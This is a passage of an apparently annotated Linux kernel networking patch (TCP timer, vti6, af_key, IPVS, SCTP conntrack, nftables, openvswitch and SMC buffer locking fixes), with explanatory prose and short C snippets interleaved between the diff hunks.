+ 		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		break;
+ 	default:
+ 		goto tx_err;
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index 0b5d0a2867a8c..cf354c29ec123 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -586,7 +586,9 @@ out_reset_timer:
+ 	    tcp_stream_is_thin(tp) &&
+ 	    icsk->icsk_retransmits <= TCP_THIN_LINEAR_RETRIES) {
+ 		icsk->icsk_backoff = 0;
+-		icsk->icsk_rto = min(__tcp_set_rto(tp), TCP_RTO_MAX);
++		icsk->icsk_rto = clamp(__tcp_set_rto(tp),
++				       tcp_rto_min(sk),
++				       TCP_RTO_MAX);
+ 	} else {
+ 		/* Use normal (exponential) backoff */
+ 		icsk->icsk_rto = min(icsk->icsk_rto << 1, TCP_RTO_MAX);
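For thin streams the old code re-armed the timer with
min(__tcp_set_rto(tp), TCP_RTO_MAX), which only bounds the value from above;
an unusually small RTT estimate could therefore schedule retransmits faster
than the configured minimum RTO. clamp() bounds on both sides. The shape of
the fix as a standalone helper (names illustrative):

	#include <linux/minmax.h>

	static u32 bounded_rto(u32 rto_from_rtt, u32 rto_min, u32 rto_max)
	{
		/* never below the floor, never above the ceiling */
		return clamp(rto_from_rtt, rto_min, rto_max);
	}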
+diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c
+index 151337d7f67b4..cb71463bbbabd 100644
+--- a/net/ipv6/ip6_vti.c
++++ b/net/ipv6/ip6_vti.c
+@@ -570,12 +570,12 @@ vti6_tnl_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		    vti6_addr_conflict(t, ipv6_hdr(skb)))
+ 			goto tx_err;
+ 
+-		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		break;
+ 	case htons(ETH_P_IP):
+-		xfrm_decode_session(skb, &fl, AF_INET);
+ 		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET);
+ 		break;
+ 	default:
+ 		goto tx_err;
+diff --git a/net/key/af_key.c b/net/key/af_key.c
+index 8c21de50eadf8..8a8f2429d5d99 100644
+--- a/net/key/af_key.c
++++ b/net/key/af_key.c
+@@ -1848,9 +1848,9 @@ static int pfkey_dump(struct sock *sk, struct sk_buff *skb, const struct sadb_ms
+ 	if (ext_hdrs[SADB_X_EXT_FILTER - 1]) {
+ 		struct sadb_x_filter *xfilter = ext_hdrs[SADB_X_EXT_FILTER - 1];
+ 
+-		if ((xfilter->sadb_x_filter_splen >=
++		if ((xfilter->sadb_x_filter_splen >
+ 			(sizeof(xfrm_address_t) << 3)) ||
+-		    (xfilter->sadb_x_filter_dplen >=
++		    (xfilter->sadb_x_filter_dplen >
+ 			(sizeof(xfrm_address_t) << 3))) {
+ 			mutex_unlock(&pfk->dump_lock);
+ 			return -EINVAL;
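sadb_x_filter_splen/dplen are prefix lengths, and a prefix may legitimately
cover the full address width: sizeof(xfrm_address_t) << 3 is 128 bits, so a
/128 filter (or /32 for IPv4 carried in the same union) must be accepted. The
old >= rejected exactly that boundary value; only strictly larger lengths are
malformed. Equivalent check as a predicate:

	#include <linux/xfrm.h>

	static bool filter_prefix_ok(u8 prefix_len)
	{
		/* valid range is 0 .. 128 inclusive */
		return prefix_len <= sizeof(xfrm_address_t) * 8;
	}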
+diff --git a/net/netfilter/ipvs/ip_vs_ctl.c b/net/netfilter/ipvs/ip_vs_ctl.c
+index 03af6a2ffd567..17a1b731a76b1 100644
+--- a/net/netfilter/ipvs/ip_vs_ctl.c
++++ b/net/netfilter/ipvs/ip_vs_ctl.c
+@@ -1798,6 +1798,7 @@ static int
+ proc_do_sync_threshold(struct ctl_table *table, int write,
+ 		       void *buffer, size_t *lenp, loff_t *ppos)
+ {
++	struct netns_ipvs *ipvs = table->extra2;
+ 	int *valp = table->data;
+ 	int val[2];
+ 	int rc;
+@@ -1807,6 +1808,7 @@ proc_do_sync_threshold(struct ctl_table *table, int write,
+ 		.mode = table->mode,
+ 	};
+ 
++	mutex_lock(&ipvs->sync_mutex);
+ 	memcpy(val, valp, sizeof(val));
+ 	rc = proc_dointvec(&tmp, write, buffer, lenp, ppos);
+ 	if (write) {
+@@ -1816,6 +1818,7 @@ proc_do_sync_threshold(struct ctl_table *table, int write,
+ 		else
+ 			memcpy(valp, val, sizeof(val));
+ 	}
++	mutex_unlock(&ipvs->sync_mutex);
+ 	return rc;
+ }
+ 
+@@ -4080,6 +4083,7 @@ static int __net_init ip_vs_control_net_init_sysctl(struct netns_ipvs *ipvs)
+ 	ipvs->sysctl_sync_threshold[0] = DEFAULT_SYNC_THRESHOLD;
+ 	ipvs->sysctl_sync_threshold[1] = DEFAULT_SYNC_PERIOD;
+ 	tbl[idx].data = &ipvs->sysctl_sync_threshold;
++	tbl[idx].extra2 = ipvs;
+ 	tbl[idx++].maxlen = sizeof(ipvs->sysctl_sync_threshold);
+ 	ipvs->sysctl_sync_refresh_period = DEFAULT_SYNC_REFRESH_PERIOD;
+ 	tbl[idx++].data = &ipvs->sysctl_sync_refresh_period;
+diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
+index 895e0ca542994..7247af51bdfc4 100644
+--- a/net/netfilter/nf_conntrack_proto_sctp.c
++++ b/net/netfilter/nf_conntrack_proto_sctp.c
+@@ -49,8 +49,8 @@ static const unsigned int sctp_timeouts[SCTP_CONNTRACK_MAX] = {
+ 	[SCTP_CONNTRACK_COOKIE_WAIT]		= 3 SECS,
+ 	[SCTP_CONNTRACK_COOKIE_ECHOED]		= 3 SECS,
+ 	[SCTP_CONNTRACK_ESTABLISHED]		= 210 SECS,
+-	[SCTP_CONNTRACK_SHUTDOWN_SENT]		= 300 SECS / 1000,
+-	[SCTP_CONNTRACK_SHUTDOWN_RECD]		= 300 SECS / 1000,
++	[SCTP_CONNTRACK_SHUTDOWN_SENT]		= 3 SECS,
++	[SCTP_CONNTRACK_SHUTDOWN_RECD]		= 3 SECS,
+ 	[SCTP_CONNTRACK_SHUTDOWN_ACK_SENT]	= 3 SECS,
+ 	[SCTP_CONNTRACK_HEARTBEAT_SENT]		= 30 SECS,
+ };
+@@ -105,7 +105,7 @@ static const u8 sctp_conntracks[2][11][SCTP_CONNTRACK_MAX] = {
+ 	{
+ /*	ORIGINAL	*/
+ /*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS */
+-/* init         */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCW},
++/* init         */ {sCL, sCL, sCW, sCE, sES, sCL, sCL, sSA, sCW},
+ /* init_ack     */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},
+ /* abort        */ {sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL},
+ /* shutdown     */ {sCL, sCL, sCW, sCE, sSS, sSS, sSR, sSA, sCL},
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index f6e6273838859..4c2df7af73f76 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -6874,6 +6874,7 @@ static int nft_set_catchall_flush(const struct nft_ctx *ctx,
+ 		ret = __nft_set_catchall_flush(ctx, set, &elem);
+ 		if (ret < 0)
+ 			break;
++		nft_set_elem_change_active(ctx->net, set, ext);
+ 	}
+ 
+ 	return ret;
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index e65a83328b554..cf9a1ae87d9b1 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -191,6 +191,9 @@ static int nft_dynset_init(const struct nft_ctx *ctx,
+ 	if (IS_ERR(set))
+ 		return PTR_ERR(set);
+ 
++	if (set->flags & NFT_SET_OBJECT)
++		return -EOPNOTSUPP;
++
+ 	if (set->ops->update == NULL)
+ 		return -EOPNOTSUPP;
+ 
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index a81829c10feab..32cfd0a84b0e2 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1665,6 +1665,17 @@ static void nft_pipapo_commit(const struct nft_set *set)
+ 	priv->clone = new_clone;
+ }
+ 
++static bool nft_pipapo_transaction_mutex_held(const struct nft_set *set)
++{
++#ifdef CONFIG_PROVE_LOCKING
++	const struct net *net = read_pnet(&set->net);
++
++	return lockdep_is_held(&nft_pernet(net)->commit_mutex);
++#else
++	return true;
++#endif
++}
++
+ static void nft_pipapo_abort(const struct nft_set *set)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+@@ -1673,7 +1684,7 @@ static void nft_pipapo_abort(const struct nft_set *set)
+ 	if (!priv->dirty)
+ 		return;
+ 
+-	m = rcu_dereference(priv->match);
++	m = rcu_dereference_protected(priv->match, nft_pipapo_transaction_mutex_held(set));
+ 
+ 	new_clone = pipapo_clone(m);
+ 	if (IS_ERR(new_clone))
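nft_pipapo_abort() runs from the transaction path with the pernet commit_mutex
held, not inside an RCU read-side critical section, so a bare rcu_dereference()
is the wrong annotation (and splats under PROVE_LOCKING).
rcu_dereference_protected() both documents and, when lockdep is enabled,
verifies the real protection. The general pattern:

	#include <linux/rcupdate.h>

	/* Updater-side access: we hold the lock that serializes writers,
	 * so no RCU read lock is needed and lockdep can check the claim. */
	m = rcu_dereference_protected(priv->match,
				      lockdep_is_held(&transaction_mutex));

where transaction_mutex stands in for nft_pernet(net)->commit_mutex as resolved
by the nft_pipapo_transaction_mutex_held() helper the hunk introduces.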
+diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
+index 5920fdca12875..3c7b245354096 100644
+--- a/net/openvswitch/datapath.c
++++ b/net/openvswitch/datapath.c
+@@ -1806,7 +1806,7 @@ static int ovs_dp_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	parms.port_no = OVSP_LOCAL;
+ 	parms.upcall_portids = a[OVS_DP_ATTR_UPCALL_PID];
+ 	parms.desired_ifindex = a[OVS_DP_ATTR_IFINDEX]
+-		? nla_get_u32(a[OVS_DP_ATTR_IFINDEX]) : 0;
++		? nla_get_s32(a[OVS_DP_ATTR_IFINDEX]) : 0;
+ 
+ 	/* So far only local changes have been made, now need the lock. */
+ 	ovs_lock();
+@@ -2026,7 +2026,7 @@ static const struct nla_policy datapath_policy[OVS_DP_ATTR_MAX + 1] = {
+ 	[OVS_DP_ATTR_USER_FEATURES] = { .type = NLA_U32 },
+ 	[OVS_DP_ATTR_MASKS_CACHE_SIZE] =  NLA_POLICY_RANGE(NLA_U32, 0,
+ 		PCPU_MIN_UNIT_SIZE / sizeof(struct mask_cache_entry)),
+-	[OVS_DP_ATTR_IFINDEX] = {.type = NLA_U32 },
++	[OVS_DP_ATTR_IFINDEX] = NLA_POLICY_MIN(NLA_S32, 0),
+ };
+ 
+ static const struct genl_small_ops dp_datapath_genl_ops[] = {
+@@ -2276,7 +2276,7 @@ restart:
+ 	parms.port_no = port_no;
+ 	parms.upcall_portids = a[OVS_VPORT_ATTR_UPCALL_PID];
+ 	parms.desired_ifindex = a[OVS_VPORT_ATTR_IFINDEX]
+-		? nla_get_u32(a[OVS_VPORT_ATTR_IFINDEX]) : 0;
++		? nla_get_s32(a[OVS_VPORT_ATTR_IFINDEX]) : 0;
+ 
+ 	vport = new_vport(&parms);
+ 	err = PTR_ERR(vport);
+@@ -2513,7 +2513,7 @@ static const struct nla_policy vport_policy[OVS_VPORT_ATTR_MAX + 1] = {
+ 	[OVS_VPORT_ATTR_TYPE] = { .type = NLA_U32 },
+ 	[OVS_VPORT_ATTR_UPCALL_PID] = { .type = NLA_UNSPEC },
+ 	[OVS_VPORT_ATTR_OPTIONS] = { .type = NLA_NESTED },
+-	[OVS_VPORT_ATTR_IFINDEX] = { .type = NLA_U32 },
++	[OVS_VPORT_ATTR_IFINDEX] = NLA_POLICY_MIN(NLA_S32, 0),
+ 	[OVS_VPORT_ATTR_NETNSID] = { .type = NLA_S32 },
+ };
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 5712a5297bd01..84219c5121bc2 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -379,8 +379,8 @@ static struct sock *smc_sock_alloc(struct net *net, struct socket *sock,
+ 	sk->sk_state = SMC_INIT;
+ 	sk->sk_destruct = smc_destruct;
+ 	sk->sk_protocol = protocol;
+-	WRITE_ONCE(sk->sk_sndbuf, READ_ONCE(net->smc.sysctl_wmem));
+-	WRITE_ONCE(sk->sk_rcvbuf, READ_ONCE(net->smc.sysctl_rmem));
++	WRITE_ONCE(sk->sk_sndbuf, 2 * READ_ONCE(net->smc.sysctl_wmem));
++	WRITE_ONCE(sk->sk_rcvbuf, 2 * READ_ONCE(net->smc.sysctl_rmem));
+ 	smc = smc_sk(sk);
+ 	INIT_WORK(&smc->tcp_listen_work, smc_tcp_listen_work);
+ 	INIT_WORK(&smc->connect_work, smc_connect_work);
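The doubling here is deliberate and pairs with the __smc_buf_create() hunk
further down: as with TCP, sk_sndbuf/sk_rcvbuf account roughly twice the usable
payload (the other half covers bookkeeping overhead), so the sysctl value is
doubled when the socket is created and halved again when the actual
RMB/send buffer is sized. Both lines below appear in this patch's hunks:

	/* socket creation: sysctl value -> socket accounting (x2) */
	WRITE_ONCE(sk->sk_sndbuf, 2 * READ_ONCE(net->smc.sysctl_wmem));

	/* buffer creation: socket accounting -> usable bytes (/2) */
	bufsize = smc->sk.sk_sndbuf / 2;

The two factors cancel, keeping the sysctl tunable meaning "usable buffer
bytes" end to end.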
+diff --git a/net/smc/smc.h b/net/smc/smc.h
+index 5ed765ea0c731..1d36720fc019c 100644
+--- a/net/smc/smc.h
++++ b/net/smc/smc.h
+@@ -161,7 +161,7 @@ struct smc_connection {
+ 
+ 	struct smc_buf_desc	*sndbuf_desc;	/* send buffer descriptor */
+ 	struct smc_buf_desc	*rmb_desc;	/* RMBE descriptor */
+-	int			rmbe_size_short;/* compressed notation */
++	int                     rmbe_size_comp; /* compressed notation */
+ 	int			rmbe_update_limit;
+ 						/* lower limit for consumer
+ 						 * cursor update
+diff --git a/net/smc/smc_clc.c b/net/smc/smc_clc.c
+index dfb9797f7bc63..9b8999e2afca5 100644
+--- a/net/smc/smc_clc.c
++++ b/net/smc/smc_clc.c
+@@ -1002,7 +1002,7 @@ static int smc_clc_send_confirm_accept(struct smc_sock *smc,
+ 		clc->hdr.typev1 = SMC_TYPE_D;
+ 		clc->d0.gid = conn->lgr->smcd->local_gid;
+ 		clc->d0.token = conn->rmb_desc->token;
+-		clc->d0.dmbe_size = conn->rmbe_size_short;
++		clc->d0.dmbe_size = conn->rmbe_size_comp;
+ 		clc->d0.dmbe_idx = 0;
+ 		memcpy(&clc->d0.linkid, conn->lgr->id, SMC_LGR_ID_SIZE);
+ 		if (version == SMC_V1) {
+@@ -1045,7 +1045,7 @@ static int smc_clc_send_confirm_accept(struct smc_sock *smc,
+ 			clc->r0.qp_mtu = min(link->path_mtu, link->peer_mtu);
+ 			break;
+ 		}
+-		clc->r0.rmbe_size = conn->rmbe_size_short;
++		clc->r0.rmbe_size = conn->rmbe_size_comp;
+ 		clc->r0.rmb_dma_addr = conn->rmb_desc->is_vm ?
+ 			cpu_to_be64((uintptr_t)conn->rmb_desc->cpu_addr) :
+ 			cpu_to_be64((u64)sg_dma_address
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index f82f43573a159..c676d92af7b7d 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -852,8 +852,8 @@ static int smc_lgr_create(struct smc_sock *smc, struct smc_init_info *ini)
+ 	lgr->freeing = 0;
+ 	lgr->vlan_id = ini->vlan_id;
+ 	refcount_set(&lgr->refcnt, 1); /* set lgr refcnt to 1 */
+-	mutex_init(&lgr->sndbufs_lock);
+-	mutex_init(&lgr->rmbs_lock);
++	init_rwsem(&lgr->sndbufs_lock);
++	init_rwsem(&lgr->rmbs_lock);
+ 	rwlock_init(&lgr->conns_lock);
+ 	for (i = 0; i < SMC_RMBE_SIZES; i++) {
+ 		INIT_LIST_HEAD(&lgr->sndbufs[i]);
+@@ -1095,7 +1095,7 @@ err_out:
+ static void smcr_buf_unuse(struct smc_buf_desc *buf_desc, bool is_rmb,
+ 			   struct smc_link_group *lgr)
+ {
+-	struct mutex *lock;	/* lock buffer list */
++	struct rw_semaphore *lock;	/* lock buffer list */
+ 	int rc;
+ 
+ 	if (is_rmb && buf_desc->is_conf_rkey && !list_empty(&lgr->list)) {
+@@ -1115,9 +1115,9 @@ static void smcr_buf_unuse(struct smc_buf_desc *buf_desc, bool is_rmb,
+ 		/* buf registration failed, reuse not possible */
+ 		lock = is_rmb ? &lgr->rmbs_lock :
+ 				&lgr->sndbufs_lock;
+-		mutex_lock(lock);
++		down_write(lock);
+ 		list_del(&buf_desc->list);
+-		mutex_unlock(lock);
++		up_write(lock);
+ 
+ 		smc_buf_free(lgr, is_rmb, buf_desc);
+ 	} else {
+@@ -1220,15 +1220,16 @@ static void smcr_buf_unmap_lgr(struct smc_link *lnk)
+ 	int i;
+ 
+ 	for (i = 0; i < SMC_RMBE_SIZES; i++) {
+-		mutex_lock(&lgr->rmbs_lock);
++		down_write(&lgr->rmbs_lock);
+ 		list_for_each_entry_safe(buf_desc, bf, &lgr->rmbs[i], list)
+ 			smcr_buf_unmap_link(buf_desc, true, lnk);
+-		mutex_unlock(&lgr->rmbs_lock);
+-		mutex_lock(&lgr->sndbufs_lock);
++		up_write(&lgr->rmbs_lock);
++
++		down_write(&lgr->sndbufs_lock);
+ 		list_for_each_entry_safe(buf_desc, bf, &lgr->sndbufs[i],
+ 					 list)
+ 			smcr_buf_unmap_link(buf_desc, false, lnk);
+-		mutex_unlock(&lgr->sndbufs_lock);
++		up_write(&lgr->sndbufs_lock);
+ 	}
+ }
+ 
+@@ -1986,19 +1987,19 @@ int smc_uncompress_bufsize(u8 compressed)
+  * buffer size; if not available, return NULL
+  */
+ static struct smc_buf_desc *smc_buf_get_slot(int compressed_bufsize,
+-					     struct mutex *lock,
++					     struct rw_semaphore *lock,
+ 					     struct list_head *buf_list)
+ {
+ 	struct smc_buf_desc *buf_slot;
+ 
+-	mutex_lock(lock);
++	down_read(lock);
+ 	list_for_each_entry(buf_slot, buf_list, list) {
+ 		if (cmpxchg(&buf_slot->used, 0, 1) == 0) {
+-			mutex_unlock(lock);
++			up_read(lock);
+ 			return buf_slot;
+ 		}
+ 	}
+-	mutex_unlock(lock);
++	up_read(lock);
+ 	return NULL;
+ }
+ 
+@@ -2107,13 +2108,13 @@ int smcr_link_reg_buf(struct smc_link *link, struct smc_buf_desc *buf_desc)
+ 	return 0;
+ }
+ 
+-static int _smcr_buf_map_lgr(struct smc_link *lnk, struct mutex *lock,
++static int _smcr_buf_map_lgr(struct smc_link *lnk, struct rw_semaphore *lock,
+ 			     struct list_head *lst, bool is_rmb)
+ {
+ 	struct smc_buf_desc *buf_desc, *bf;
+ 	int rc = 0;
+ 
+-	mutex_lock(lock);
++	down_write(lock);
+ 	list_for_each_entry_safe(buf_desc, bf, lst, list) {
+ 		if (!buf_desc->used)
+ 			continue;
+@@ -2122,7 +2123,7 @@ static int _smcr_buf_map_lgr(struct smc_link *lnk, struct mutex *lock,
+ 			goto out;
+ 	}
+ out:
+-	mutex_unlock(lock);
++	up_write(lock);
+ 	return rc;
+ }
+ 
+@@ -2155,37 +2156,37 @@ int smcr_buf_reg_lgr(struct smc_link *lnk)
+ 	int i, rc = 0;
+ 
+ 	/* reg all RMBs for a new link */
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	for (i = 0; i < SMC_RMBE_SIZES; i++) {
+ 		list_for_each_entry_safe(buf_desc, bf, &lgr->rmbs[i], list) {
+ 			if (!buf_desc->used)
+ 				continue;
+ 			rc = smcr_link_reg_buf(lnk, buf_desc);
+ 			if (rc) {
+-				mutex_unlock(&lgr->rmbs_lock);
++				up_write(&lgr->rmbs_lock);
+ 				return rc;
+ 			}
+ 		}
+ 	}
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ 
+ 	if (lgr->buf_type == SMCR_PHYS_CONT_BUFS)
+ 		return rc;
+ 
+ 	/* reg all vzalloced sndbufs for a new link */
+-	mutex_lock(&lgr->sndbufs_lock);
++	down_write(&lgr->sndbufs_lock);
+ 	for (i = 0; i < SMC_RMBE_SIZES; i++) {
+ 		list_for_each_entry_safe(buf_desc, bf, &lgr->sndbufs[i], list) {
+ 			if (!buf_desc->used || !buf_desc->is_vm)
+ 				continue;
+ 			rc = smcr_link_reg_buf(lnk, buf_desc);
+ 			if (rc) {
+-				mutex_unlock(&lgr->sndbufs_lock);
++				up_write(&lgr->sndbufs_lock);
+ 				return rc;
+ 			}
+ 		}
+ 	}
+-	mutex_unlock(&lgr->sndbufs_lock);
++	up_write(&lgr->sndbufs_lock);
+ 	return rc;
+ }
+ 
+@@ -2304,31 +2305,30 @@ static int __smc_buf_create(struct smc_sock *smc, bool is_smcd, bool is_rmb)
+ 	struct smc_connection *conn = &smc->conn;
+ 	struct smc_link_group *lgr = conn->lgr;
+ 	struct list_head *buf_list;
+-	int bufsize, bufsize_short;
++	int bufsize, bufsize_comp;
++	struct rw_semaphore *lock;	/* lock buffer list */
+ 	bool is_dgraded = false;
+-	struct mutex *lock;	/* lock buffer list */
+-	int sk_buf_size;
+ 
+ 	if (is_rmb)
+ 		/* use socket recv buffer size (w/o overhead) as start value */
+-		sk_buf_size = smc->sk.sk_rcvbuf;
++		bufsize = smc->sk.sk_rcvbuf / 2;
+ 	else
+ 		/* use socket send buffer size (w/o overhead) as start value */
+-		sk_buf_size = smc->sk.sk_sndbuf;
++		bufsize = smc->sk.sk_sndbuf / 2;
+ 
+-	for (bufsize_short = smc_compress_bufsize(sk_buf_size, is_smcd, is_rmb);
+-	     bufsize_short >= 0; bufsize_short--) {
++	for (bufsize_comp = smc_compress_bufsize(bufsize, is_smcd, is_rmb);
++	     bufsize_comp >= 0; bufsize_comp--) {
+ 		if (is_rmb) {
+ 			lock = &lgr->rmbs_lock;
+-			buf_list = &lgr->rmbs[bufsize_short];
++			buf_list = &lgr->rmbs[bufsize_comp];
+ 		} else {
+ 			lock = &lgr->sndbufs_lock;
+-			buf_list = &lgr->sndbufs[bufsize_short];
++			buf_list = &lgr->sndbufs[bufsize_comp];
+ 		}
+-		bufsize = smc_uncompress_bufsize(bufsize_short);
++		bufsize = smc_uncompress_bufsize(bufsize_comp);
+ 
+ 		/* check for reusable slot in the link group */
+-		buf_desc = smc_buf_get_slot(bufsize_short, lock, buf_list);
++		buf_desc = smc_buf_get_slot(bufsize_comp, lock, buf_list);
+ 		if (buf_desc) {
+ 			buf_desc->is_dma_need_sync = 0;
+ 			SMC_STAT_RMB_SIZE(smc, is_smcd, is_rmb, bufsize);
+@@ -2354,9 +2354,9 @@ static int __smc_buf_create(struct smc_sock *smc, bool is_smcd, bool is_rmb)
+ 		SMC_STAT_RMB_ALLOC(smc, is_smcd, is_rmb);
+ 		SMC_STAT_RMB_SIZE(smc, is_smcd, is_rmb, bufsize);
+ 		buf_desc->used = 1;
+-		mutex_lock(lock);
++		down_write(lock);
+ 		list_add(&buf_desc->list, buf_list);
+-		mutex_unlock(lock);
++		up_write(lock);
+ 		break; /* found */
+ 	}
+ 
+@@ -2372,8 +2372,8 @@ static int __smc_buf_create(struct smc_sock *smc, bool is_smcd, bool is_rmb)
+ 
+ 	if (is_rmb) {
+ 		conn->rmb_desc = buf_desc;
+-		conn->rmbe_size_short = bufsize_short;
+-		smc->sk.sk_rcvbuf = bufsize;
++		conn->rmbe_size_comp = bufsize_comp;
++		smc->sk.sk_rcvbuf = bufsize * 2;
+ 		atomic_set(&conn->bytes_to_rcv, 0);
+ 		conn->rmbe_update_limit =
+ 			smc_rmb_wnd_update_limit(buf_desc->len);
+@@ -2381,7 +2381,7 @@ static int __smc_buf_create(struct smc_sock *smc, bool is_smcd, bool is_rmb)
+ 			smc_ism_set_conn(conn); /* map RMB/smcd_dev to conn */
+ 	} else {
+ 		conn->sndbuf_desc = buf_desc;
+-		smc->sk.sk_sndbuf = bufsize;
++		smc->sk.sk_sndbuf = bufsize * 2;
+ 		atomic_set(&conn->sndbuf_space, bufsize);
+ 	}
+ 	return 0;
+@@ -2430,9 +2430,9 @@ int smc_buf_create(struct smc_sock *smc, bool is_smcd)
+ 	/* create rmb */
+ 	rc = __smc_buf_create(smc, is_smcd, true);
+ 	if (rc) {
+-		mutex_lock(&smc->conn.lgr->sndbufs_lock);
++		down_write(&smc->conn.lgr->sndbufs_lock);
+ 		list_del(&smc->conn.sndbuf_desc->list);
+-		mutex_unlock(&smc->conn.lgr->sndbufs_lock);
++		up_write(&smc->conn.lgr->sndbufs_lock);
+ 		smc_buf_free(smc->conn.lgr, false, smc->conn.sndbuf_desc);
+ 		smc->conn.sndbuf_desc = NULL;
+ 	}
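Converting sndbufs_lock/rmbs_lock from mutexes to rw_semaphores lets the hot
path — scanning a buffer list for a reusable slot — run concurrently across
connections, since claiming a slot is already atomic via cmpxchg() on
buf_desc->used and needs no exclusive hold; only structural list changes take
the lock exclusively. Condensed reader/writer split, following
smc_buf_get_slot() and __smc_buf_create():

	down_read(lock);			/* shared: walk the list */
	list_for_each_entry(buf_slot, buf_list, list) {
		if (cmpxchg(&buf_slot->used, 0, 1) == 0) {
			up_read(lock);
			return buf_slot;	/* slot claimed atomically */
		}
	}
	up_read(lock);

	down_write(lock);			/* exclusive: mutate the list */
	list_add(&buf_desc->list, buf_list);
	up_write(lock);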
+diff --git a/net/smc/smc_core.h b/net/smc/smc_core.h
+index 285f9bd8e232e..6051d92270130 100644
+--- a/net/smc/smc_core.h
++++ b/net/smc/smc_core.h
+@@ -252,9 +252,9 @@ struct smc_link_group {
+ 	unsigned short		vlan_id;	/* vlan id of link group */
+ 
+ 	struct list_head	sndbufs[SMC_RMBE_SIZES];/* tx buffers */
+-	struct mutex		sndbufs_lock;	/* protects tx buffers */
++	struct rw_semaphore	sndbufs_lock;	/* protects tx buffers */
+ 	struct list_head	rmbs[SMC_RMBE_SIZES];	/* rx buffers */
+-	struct mutex		rmbs_lock;	/* protects rx buffers */
++	struct rw_semaphore	rmbs_lock;	/* protects rx buffers */
+ 
+ 	u8			id[SMC_LGR_ID_SIZE];	/* unique lgr id */
+ 	struct delayed_work	free_work;	/* delayed freeing of an lgr */
+diff --git a/net/smc/smc_llc.c b/net/smc/smc_llc.c
+index 760f8bbff822e..fcb24a0ccf761 100644
+--- a/net/smc/smc_llc.c
++++ b/net/smc/smc_llc.c
+@@ -611,7 +611,7 @@ static int smc_llc_fill_ext_v2(struct smc_llc_msg_add_link_v2_ext *ext,
+ 
+ 	prim_lnk_idx = link->link_idx;
+ 	lnk_idx = link_new->link_idx;
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	ext->num_rkeys = lgr->conns_num;
+ 	if (!ext->num_rkeys)
+ 		goto out;
+@@ -631,7 +631,7 @@ static int smc_llc_fill_ext_v2(struct smc_llc_msg_add_link_v2_ext *ext,
+ 	}
+ 	len += i * sizeof(ext->rt[0]);
+ out:
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ 	return len;
+ }
+ 
+@@ -892,7 +892,7 @@ static int smc_llc_cli_rkey_exchange(struct smc_link *link,
+ 	int rc = 0;
+ 	int i;
+ 
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	num_rkeys_send = lgr->conns_num;
+ 	buf_pos = smc_llc_get_first_rmb(lgr, &buf_lst);
+ 	do {
+@@ -919,7 +919,7 @@ static int smc_llc_cli_rkey_exchange(struct smc_link *link,
+ 			break;
+ 	} while (num_rkeys_send || num_rkeys_recv);
+ 
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ 	return rc;
+ }
+ 
+@@ -1002,14 +1002,14 @@ static void smc_llc_save_add_link_rkeys(struct smc_link *link,
+ 	ext = (struct smc_llc_msg_add_link_v2_ext *)((u8 *)lgr->wr_rx_buf_v2 +
+ 						     SMC_WR_TX_SIZE);
+ 	max = min_t(u8, ext->num_rkeys, SMC_LLC_RKEYS_PER_MSG_V2);
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	for (i = 0; i < max; i++) {
+ 		smc_rtoken_set(lgr, link->link_idx, link_new->link_idx,
+ 			       ext->rt[i].rmb_key,
+ 			       ext->rt[i].rmb_vaddr_new,
+ 			       ext->rt[i].rmb_key_new);
+ 	}
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ }
+ 
+ static void smc_llc_save_add_link_info(struct smc_link *link,
+@@ -1316,7 +1316,7 @@ static int smc_llc_srv_rkey_exchange(struct smc_link *link,
+ 	int rc = 0;
+ 	int i;
+ 
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	num_rkeys_send = lgr->conns_num;
+ 	buf_pos = smc_llc_get_first_rmb(lgr, &buf_lst);
+ 	do {
+@@ -1341,7 +1341,7 @@ static int smc_llc_srv_rkey_exchange(struct smc_link *link,
+ 		smc_llc_flow_qentry_del(&lgr->llc_flow_lcl);
